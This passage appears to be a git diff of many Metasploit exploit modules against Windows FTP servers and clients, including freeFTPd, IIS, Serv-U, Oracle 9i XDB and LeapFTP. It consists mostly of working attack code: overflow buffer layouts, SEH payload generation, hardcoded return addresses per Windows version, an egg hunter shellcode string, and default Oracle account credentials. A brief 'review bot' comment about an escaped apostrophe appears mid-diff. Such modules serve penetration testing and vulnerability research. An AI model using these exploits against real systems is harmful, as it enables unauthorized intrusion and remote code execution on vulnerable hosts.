stack overflow in the freeFTPd multi-protocol file transfer service. This flaw can only be exploited when logging has been enabled (non-default). - }, 'Author' => 'MC', 'License' => MSF_LICENSE, 
@@ -37,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '20909'], [ 'BID', '15457'], [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'], - ], 'Privileged' => false, 'Payload' => @@ -46,55 +42,55 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'Windows 2000 English ALL', { 'Platform' => 'win', 'Ret' => 0x75022ac4, }, ], - [ + [ 'Windows XP Pro SP0/SP1 English', { 'Platform' => 'win', 'Ret' => 0x71aa32ad, }, ], - [ + [ 'Windows NT SP5/SP6a English', { 'Platform' => 'win', 'Ret' => 0x776a1799, }, ], - [ + [ 'Windows 2003 Server English', { 'Platform' => 'win', 'Ret' => 0x7ffc0638, }, - ], + ], ])) end def check connect - disconnect + disconnect if (banner =~ /freeFTPd 1\.0/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect print_status("Trying target #{target.name}...") buf = rand_text_english(1816, payload_badchars) - seh = generate_seh_payload(target.ret) + seh = generate_seh_payload(target.ret) buf[1008, seh.length] = seh send_cmd( ['USER', buf] , false) diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 7d074fd3d3..1daa4db35d 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb 
@@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'GlobalSCAPE Secure FTP Server Input Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. + This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account ( - or anonymous access) is required for this exploit to work. + or anonymous access) is required for this exploit to work. }, 'Author' => [ 'Fairuzan Roslan ', 'Mati Aharoni ' ], 'License' => BSD_LICENSE, @@ -46,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", }, - 'Targets' => + 'Targets' => [ [ 'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal', @@ -66,9 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote buf = make_nops(3047) buf[2043, 4] = [ target.ret ].pack('V') buf[2047, payload.encoded.length] = payload.encoded - + send_cmd( [buf] ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index a2575f0580..c27f44dc71 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb 
@@ -111,7 +111,7 @@ To find a target: 4. follow the xref to the imports area 5. copy/paste the address 6. the 'Writable' value should be anything after the last address IDA shows.. - (preferably something above 0x0d, to avoid bad chars) + (preferably something above 0x0d, to avoid bad chars) If crashes occur referencing strange values, 'NumPops' probably needs adjusting. For now, that will have to be done manually. @@ -140,7 +140,7 @@ For now, that will have to be done manually. def exploit - # Use a copy of the target + # Use a copy of the target mytarget = target if (target['auto']) diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index 8b85738585..9f9ff4b70a 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,15 +19,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 + This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 client that is triggered through an excessively long PASV reply command. This module was ported from the original exploit by drG4njubas with minor improvements. }, 'Author' => [ 'Patrick Webster ' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2003-0558' ], [ 'OSVDB', '4587' ], [ 'BID', '7860' ], 
@@ -48,66 +46,66 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK. - [ 'Universal LeapFTP.exe', { 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe + # Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK. + [ 'Universal LeapFTP.exe', { 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe [ 'Windows 2000 SP0/4 English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - [ 'Windows XP SP0 English', { 'Ret' => 0x7660139c } ], # p/p/r cscdll.dll + [ 'Windows XP SP0 English', { 'Ret' => 0x7660139c } ], # p/p/r cscdll.dll ], 'Privileged' => false, 'DisclosureDate' => 'Jun 09 2003', 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]), OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]), ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n" client.put(buffer) end - + def on_client_data(client) - - + + client.get_once - + # This could be improved if anyone wants to write a FTP server API. user = "331 Please specify the password.\r\n" client.put(user) - + client.get_once pass = "230 Login successful.\r\n" client.put(pass) - + client.get_once syst = "215 Windows_NT 5.1\r\n" client.put(syst) - + client.get_once rest = "350 Restart position accepted (100).\r\n" client.put(rest) - + client.get_once rest = "350 Restart position accepted (0).\r\n" client.put(rest) - + client.get_once pwd = "257 \"/\"\r\n" client.put(pwd) - + client.get_once type = "200 Switching to ASCII mode.\r\n" client.put(type) - + client.get_once port = "500 Illegal PORT command.\r\n" # We force LeapFTP to use PASV. It will try PORT first. 
client.put(port) - + client.get_once pasv = "227 Entering Passive Mode (" pasv << rand_text_numeric(1053) + generate_seh_payload(target.ret) @@ -117,9 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote pasv << "," + rand_text_numeric(1) pasv << "," + rand_text_numeric(1) pasv << ")\r\n" - + client.put(pasv) - + handler(client) service.close_client(client) end diff --git a/modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb b/modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb index f79df56b19..f9064e34fa 100644 --- a/modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb 
@@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::Ftp - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS FTP Server NLST Response Overflow', 'Description' => %q{ - This module exploits a stack overflow flaw in the Microsoft IIS FTP - service. The flaw is triggered when a special NLST argument is passed - while the session has changed into a long directory path. For this exploit - to work, the FTP server must be configured to allow write access to the - file system (either anonymously or in conjunction with a real account) - + This module exploits a stack overflow flaw in the Microsoft IIS FTP + service. The flaw is triggered when a special NLST argument is passed + while the session has changed into a long directory path. For this exploit + to work, the FTP server must be configured to allow write access to the + file system (either anonymously or in conjunction with a real account) }, 'Author' => [ 'Kingcope ', 'hdm' ], 'License' => MSF_LICENSE, @@ -52,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Targets' => - [ + [ [ 'Windows 2000 SP4 English/Italian (IIS 5.0)', { 
@@ -91,51 +88,51 @@ class Metasploit3 < Msf::Exploit::Remote based = rand_text_alpha_upper(10) - - res = send_cmd( ['MKD', based ], true ) + + res = send_cmd( ['MKD', based ], true ) print_status(res.strip) - + if (res !~ /directory created/) print_error("The root directory of the FTP server is not writeable") disconnect return end - + res = send_cmd( ['CWD', based ], true ) print_status(res.strip) - + egg = rand_text_alpha_upper(4) hun = "\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38#{egg}\x75\xF7\x40\x40\x40\x40\xFF\xE0" - + # This egg hunter is necessary because of the huge set of restricted characters for directory names # The best that metasploit could so was 133 bytes for an alphanum encoded egg hunter # The egg hunter above was written by kcope and searches from 0x70000 forward (stack) in order # to locate the real shellcode. The only change from the original hunter was to randomize the # prefix used. - + # Store our real shellcode on the stack 1.upto(5) do res = send_cmd( ['SITE', egg + payload.encoded.gsub("\xff", "\xff\xff") ], true ) end - + # Create the directory path that will be used in the overflow - pre = rand_text_alpha_upper(3) # esp+0x28 points here + pre = rand_text_alpha_upper(3) # esp+0x28 points here pst = rand_text_alpha_upper(210) # limited by max path pst[ 0, hun.length] = hun # egg hunter - pst[ 90, 4] = [target['Patch']].pack('V') # patch smashed pointers + pst[ 90, 4] = [target['Patch']].pack('V') # patch smashed pointers pst[ 94, 4] = [target['Patch']].pack('V') # patch smashed pointers pst[140, 32] = [target['Patch']].pack('V') * 8 # patch smashed pointers pst[158, 4] = [target.ret].pack("V") # return pst[182, 5] = "\xe9" + [-410].pack("V") # jmp back - + # Escape each 0xff with another 0xff for FTP pst = pst.gsub("\xff", "\xff\xff") - + print_status("Creating long directory...") - res = send_cmd( ['MKD', pre+pst ], true ) + res = send_cmd( ['MKD', pre+pst ], true ) print_status(res.strip) - + srv = 
Rex::Socket::TcpServer.create( 'LocalHost' => '0.0.0.0', 'LocalPort' => 0, @@ -145,30 +142,30 @@ class Metasploit3 < Msf::Exploit::Remote 'MsfExploit' => self, } ) - + begin - + thr = Thread.new { srv.accept } - + prt = srv.getsockname[2] prt1 = prt / 256 prt2 = prt % 256 addr = Rex::Socket.source_address(rhost).gsub(".", ",") + ",#{prt1},#{prt2}" - res = send_cmd( ['PORT', addr ], true ) + res = send_cmd( ['PORT', addr ], true ) print_status(res.strip) - print_status("Trying target #{target.name}...") + print_status("Trying target #{target.name}...") - res = send_cmd( ['NLST', pre+pst + "*/../" + pre + "*/"], true ) + res = send_cmd( ['NLST', pre+pst + "*/../" + pre + "*/"], true ) print_status(res.strip) if res sleep(2) - + handler disconnect - + ensure thr.kill srv.close diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index 7bbed07631..eb5054a7f8 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb 
@@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NetTerm NetFTPD USER Buffer Overflow', 'Description' => %q{ - This module exploits a vulnerability in the NetTerm NetFTPD + This module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. - This module uses the USER command to trigger the overflow. + This module uses the USER command to trigger the overflow. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -35,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '15865'], [ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'], [ 'BID', '13396'], - ], 'Privileged' => false, 'Payload' => @@ -43,46 +40,44 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1000, 'BadChars' => "\x00\x0a\x20\x0d", 'StackAdjustment' => -3500, - }, - - 'Targets' => + 'Targets' => [ - [ + [ 'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005 { 'Platform' => 'win', 'Ret' => 0x0040df98, # netftpd.exe (multiple versions) }, ], - [ + [ 'Windows 2000 English', { 'Platform' => 'win', 'Ret' => 0x75022ac4, # ws2help.dll }, ], - [ + [ 'Windows XP English SP0/SP1', { 'Platform' => 'win', 'Ret' => 0x71aa32ad, # ws2help.dll }, ], - [ + [ 'Windows 2003 English', { 'Platform' => 'win', 'Ret' => 0x7ffc0638, # peb magic :-) }, ], - [ + [ 'Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Ret' => 0x77681799, # ws2help.dll }, - ], + ], ], 'DisclosureDate' => 'Apr 26 2005', 'DefaultTarget' => 0)) 
@@ -90,16 +85,16 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - disconnect + disconnect if (banner =~ /NetTerm FTP server/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end def exploit connect - + print_status("Trying target #{target.name}...") # U push ebp @@ -112,10 +107,10 @@ class Metasploit3 < Msf::Exploit::Remote buf[0, 1] = "\xc0" buf[1, payload.encoded.length] = payload.encoded buf[1014, 4] = [ target.ret ].pack('V') - + send_cmd( ["USER #{buf}"] ) send_cmd( ['HELP'] ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index bd72c8ef64..ba48efabe2 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -3,32 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)', 'Description' => %q{ - By passing an overly long string to the PASS command, a + By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference. - }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 
@@ -49,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 800, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Targets' => [ @@ -64,18 +61,17 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Aug 18 2003', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(2100),], self.class) - deregister_options('FTPUSER', 'FTPPASS') - + register_options([Opt::RPORT(2100),], self.class) + deregister_options('FTPUSER', 'FTPPASS') end - + def check connect - disconnect + disconnect if (banner =~ /9\.2\.0\.1\.0/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end @@ -83,14 +79,14 @@ class Metasploit3 < Msf::Exploit::Remote connect user = rand_text_alpha_upper(10) - sploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6) + sploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6) sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded - - print_status("Trying target #{target.name}...") - + + print_status("Trying target #{target.name}...") + send_cmd( ['USER', user], true ) send_cmd( ['PASS', sploit], false ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index db18db6bed..9ef31b055f 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking 
@@ -20,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)', 'Description' => %q{ - By passing an overly long token to the UNLOCK command, a + By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit @@ -31,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsmp, scott:tiger, system:manager, and sys:change_on_install. - }, 'Author' => [ 'MC', 'David Litchfield ' ], 'License' => MSF_LICENSE, 
@@ -42,60 +39,58 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '2449'], [ 'BID', '8375'], [ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], - ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Privileged' => true, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ - [ + [ 'Oracle 9.2.0.1 Universal', { 'Platform' => 'win', - 'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret) + 'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret) }, ], ], 'DisclosureDate' => 'Aug 18 2003', 'DefaultTarget' => 0)) - register_options( [ - Opt::RPORT(2100), - OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']), - OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']), - ], self.class ) + register_options([ + Opt::RPORT(2100), + OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']), + OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']), + ], self.class ) end def check connect - disconnect + disconnect if (banner =~ /9\.2\.0\.1\.0/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end def exploit connect_login - + print_status("Trying target #{target.name}...") buf = rand_text_english(1130, payload_badchars) - seh = generate_seh_payload(target.ret) + seh = generate_seh_payload(target.ret) buf[322, seh.length] = seh send_cmd( ['UNLOCK', '/', buf] , false ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index f94db24be3..52cf3c50e3 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb 
@@ -1,11 +1,14 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -15,13 +18,13 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'ProFTP 2.9 Banner Remote Buffer Overflow Exploit', 'Description' => %q{ - This module exploits a buffer overflow in the ProFTP 2.9 + This module exploits a buffer overflow in the ProFTP 2.9 client that is triggered through an excessively long welcome message. }, 'Author' => [ 'His0k4 ' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-3976' ], [ 'OSVDB', '57394' ], @@ -38,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Tested against - XP SP3 English OK. [ 'Universal', { 'Ret' => 0x6809d408 } ], # WCMDPA10 (part of ProFTP) @@ -47,13 +50,13 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]), ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) buffer = "220 " buffer << rand_text_numeric(2064) @@ -63,5 +66,5 @@ class Metasploit3 < Msf::Exploit::Remote buffer << "\r\n" client.put(buffer) end - + end diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 64047408b7..c485ed3bf2 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb 
@@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -19,10 +19,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'KarjaSoft Sami FTP Server v2.02 USER Overflow', 'Description' => %q{ - This module exploits the KarjaSoft Sami FTP Server version 2.02 + This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + }, 'Platform' => ['win'], 'Privileged' => false, 'Payload' => 
@@ -62,15 +62,15 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Targets' => - [ - [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll - [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll - [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll - ], + [ + [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll + [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll + [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll + [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll + ], 'DisclosureDate' => 'Jan 24 2006')) - register_options( + register_options( [ Opt::RPORT(21), ], self.class) diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index ff0f6a76b8..6a20621105 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' 
@@ -17,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Sasser Worm avserve FTP PORT Buffer Overflow', 'Description' => %q{ - This module exploits the FTP server component of the Sasser worm. + This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten. }, 'Author' => [ 'valsmith [at] metasploit.com>', 'chamuco [at] gmail.com>', 'patrick' ], @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'May 10 2004', 'DefaultTarget' => 1)) - register_options( + register_options( [ Opt::RPORT(5554), ], self.class) diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 65849876db..148f7f1102 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -20,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Egghunter def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Serv-U FTPD MDTM Overflow', 'Description' => %q{ - This is an exploit for the Serv-U's MDTM command timezone + This is an exploit for the Serv-U\'s MDTM command timezone overflow. It has been heavily tested against versions 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against nt4/2k/xp/2k3. I have also had success against version 3, 
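Review bot: The new `Serv-U\'s` in the servu_mdtm.rb description is inside a `%q{ ... }` literal, where only `\\` and the `{`/`}` delimiters are escape sequences, so the backslash is kept and the module's description text now reads `Serv-U\'s` instead of `Serv-U's`. Because the literal is brace-delimited, a bare apostrophe needs no escaping; the old line was correct as written. Restore `This is an exploit for the Serv-U's MDTM command timezone` (or, if the apostrophe is being escaped for some tool downstream, that tool should be named in a comment). The enclosing `initialize`/`update_info` call continues outside this hunk.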
@@ -34,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote This exploit is a single hit, the service dies after the shellcode finishes execution. - }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, @@ -47,7 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.cnhonker.com/advisory/serv-u.mdtm.txt'], [ 'URL', 'http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54'], [ 'BID', '9751'], - ], 'Privileged' => false, 'Payload' => @@ -55,43 +51,42 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1000, 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ - [ + [ 'Serv-U Uber-Leet Universal ServUDaemon.exe', # Tested OK - hdm 11/25/2005 { 'Platform' => 'win', 'Ret' => 0x00401877, }, ], - [ + [ 'Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe', { 'Platform' => 'win', 'Ret' => 0x0040164d, }, ], - [ + [ 'Serv-U 5.0.0.0 ServUDaemon.exe', { 'Platform' => 'win', 'Ret' => 0x0040167e, }, - ], + ], ], 'DisclosureDate' => 'Feb 26 2004', 'DefaultTarget' => 0)) - + register_advanced_options( - [ - OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]), - OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]), - ], self.class) - + [ + OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]), + OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]), + ], self.class) + end - + # From 5.0.0.4 Change Log # "* Fixed bug in MDTM command that potentially caused the daemon to crash." # 
@@ -101,20 +96,20 @@ class Metasploit3 < Msf::Exploit::Remote # 220 ProFTPD 1.2.5rc1 Server (ftp2.rhinosoft.com) [62.116.5.74] # # Heh :) - + def check connect - disconnect - + disconnect + case banner when /Serv-U FTP Server v4\.1/ print_status('Found version 4.1.0.3, exploitable') return Exploit::CheckCode::Vulnerable - + when /Serv-U FTP Server v5\.0/ print_status('Found version 5.0.0.0 (exploitable) or 5.0.0.4 (not), try it!'); return Exploit::CheckCode::Appears - + when /Serv-U FTP Server v4\.0/ print_status('Found version 4.0.0.4 or 4.1.0.0, additional check.'); send_user(datastore['USER']) @@ -126,11 +121,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status('Found version 4.1.0.0, exploitable'); return Exploit::CheckCode::Vulnerable end - + when /Serv-U FTP Server/ print_status('Found an unknown version, try it!'); return Exploit::CheckCode::Detected - + else print_status('We could not recognize the server banner') return Exploit::CheckCode::Safe @@ -138,19 +133,19 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - + def exploit - + # generate_egghunter connect_login - + print_status("Trying target #{target.name}...") # Should have 